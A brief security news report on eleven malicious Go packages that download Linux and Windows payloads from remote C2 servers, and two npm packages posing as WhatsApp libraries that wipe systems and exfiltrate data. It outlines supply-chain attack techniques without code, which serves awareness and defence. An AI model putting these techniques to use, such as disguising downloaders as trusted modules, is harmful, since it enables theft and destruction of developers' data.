Malicious Go, npm Packages Deliver Cross-Platform Malware, Trigger Remote Data Wipes

08.08.2025

Cybersecurity researchers have identified 11 malicious Go packages that target both Windows and Linux systems by downloading and executing additional payloads from remote servers. Upon execution, the code silently spawns a shell, retrieves second-stage payloads from .icu and .tech C2 servers, and runs them in memory. These payloads can collect system information, access browser data, and communicate with their C2 servers.

The packages use obfuscated loaders to deliver ELF (for Linux) and PE (for Windows) binaries. On Linux, a bash-scripted payload is used, while on Windows, certutil.exe fetches executables—making both development environments vulnerable. The decentralized nature of Go’s module system, which allows imports directly from GitHub, increases the risk as attackers mimic trustworthy module names to trick developers.

Researchers believe these packages were created by a single threat actor due to shared code patterns and C2 infrastructure. This highlights the ongoing supply chain risks in the Go ecosystem, where cross-platform compatibility can be exploited for malware delivery.

In parallel, two malicious npm packages, naya-flore and nvlore-hsc, were discovered masquerading as WhatsApp socket libraries. These include a kill switch that wipes systems not linked to Indonesian phone numbers and attempt to exfiltrate data. One package even contains a hardcoded GitHub token, suggesting possible future misuse. These incidents underline the growing threat of malware distribution through open-source repositories.